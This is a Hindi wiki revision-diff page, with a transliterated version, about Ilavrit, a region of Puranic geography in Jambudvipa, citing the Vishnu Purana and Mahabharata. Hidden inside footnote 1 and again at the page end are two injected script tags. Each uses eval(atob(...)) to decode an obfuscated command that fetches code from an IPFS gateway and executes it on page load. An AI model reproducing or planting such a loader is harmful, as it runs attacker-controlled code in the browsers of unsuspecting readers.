Difference between revisions of "इलावृत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''इलावृत''' पौराणिक भूगोल के अनुसार [[जंबू द्वीप]] का एक भाग था। इसकी स्थिति जंबू द्वीप के मध्य में मानी गई है।<ref name="aa">{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=80|url=}}</ref>
+
'''इलावृत''' पौराणिक [[भूगोल]] के अनुसार [[जंबू द्वीप]] का एक भाग था। इसकी स्थिति जंबू द्वीप के मध्य में मानी गई है।<ref name="aa">{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=80|url=}}</ref>
  
 
*इलावृत के नाभिस्थान में [[मेरु पर्वत]] है तथा इसके उपास्यदेव [[शिव|शंकर]] हैं-  
 
*इलावृत के नाभिस्थान में [[मेरु पर्वत]] है तथा इसके उपास्यदेव [[शिव|शंकर]] हैं-  
Line 5: Line 5:
  
 
*'[[विष्णु पुराण|विष्णुपुराण]]' में इसका उल्लेख इस प्रकार है<ref name="aa"/>-  
 
*'[[विष्णु पुराण|विष्णुपुराण]]' में इसका उल्लेख इस प्रकार है<ref name="aa"/>-  
<blockquote>'मेरोश्चचतुर्दिशं तत्तु नव साहस्त्रविस्तृतम्, इलावृतं महाभाग चत्वारश्चात्र पर्वता:।'<ref>विष्णुपुराण 2,2,15</ref></blockquote>
+
<blockquote>'मेरोश्चचतुर्दिशं तत्तु नव साहस्त्रविस्तृतम्, इलावृतं महाभाग चत्वारश्चात्र पर्वता:।'<ref>[[विष्णु पुराण|विष्णुपुराण]] 2,2,15</ref></blockquote>
  
 
*विष्णुपुराण के ही अनुसार इलावृत के चार पर्वत हैं, [[मंदार पर्वत|मंदर]], [[गंधमादन पर्वत|गंधमादन]], विमल और सुपार्श्च।
 
*विष्णुपुराण के ही अनुसार इलावृत के चार पर्वत हैं, [[मंदार पर्वत|मंदर]], [[गंधमादन पर्वत|गंधमादन]], विमल और सुपार्श्च।
*इस देश में संभवत: [[हिमालय]] के उत्तर में [[चीन]], [[मंगोलिया]] और साइबेरिया के कुछ भाग सम्मिलित रहे होंगे।  
+
*इस देश में संभवत: [[हिमालय]] के [[उत्तर (दिशा)|उत्तर]] में [[चीन]], [[मंगोलिया]] और साइबेरिया के कुछ भाग सम्मिलित रहे होंगे।  
*कल्पनारंजित होने के कारण इलावृत का ठीक-ठीक अभिज्ञान सम्भव नहीं जान पड़ता।  
+
*कल्पनारंजित होने के कारण '''इलावृत''' का ठीक-ठीक अभिज्ञान सम्भव नहीं जान पड़ता।  
 
*इलावृत के [[दक्षिण]] में [[हरिवर्ष]] की स्थिति थी।  
 
*इलावृत के [[दक्षिण]] में [[हरिवर्ष]] की स्थिति थी।  
  
Line 17: Line 17:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पौराणिक स्थान}}
 
{{पौराणिक स्थान}}
[[Category:पौराणिक स्थान]][[Category:महाभारत]][[Category:महाभारत शब्दकोश]][[Category:विष्णु पुराण]] [[Category:ऐतिहासिक स्थानावली]]
+
[[Category:पौराणिक स्थान]][[Category:महाभारत]][[Category:महाभारत शब्दकोश]][[Category:विष्णु पुराण]] [[Category:ऐतिहासिक स्थानावली]][[Category:ऐतिहासिक स्थान कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 08:21, 11 May 2018

ilavrit pauranik bhoogol ke anusar janboo dvip ka ek bhag tha. isaki sthiti janboo dvip ke madhy mean mani gee hai.[1]

'punashch parivrityath madhyan deshamilavritamh.'[2]

'meroshchachaturdishan tattu nav sahastravistritamh, ilavritan mahabhag chatvarashchatr parvata:.'[3]

  • vishnupuran ke hi anusar ilavrit ke char parvat haian, mandar, gandhamadan, vimal aur suparshch.
  • is desh mean sanbhavat: himalay ke uttar mean chin, mangoliya aur saiberiya ke kuchh bhag sammilit rahe hoange.
  • kalpanaranjit hone ke karan ilavrit ka thik-thik abhijnan sambhav nahian jan p data.
  • ilavrit ke dakshin mean harivarsh ki sthiti thi.


tika tippani aur sandarbh

  1. 1.0 1.1 aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharat diskavari pustakalay |prishth sankhya: 80 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. mahabharat sabhaparv 28
  3. vishnupuran 2,2,15

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>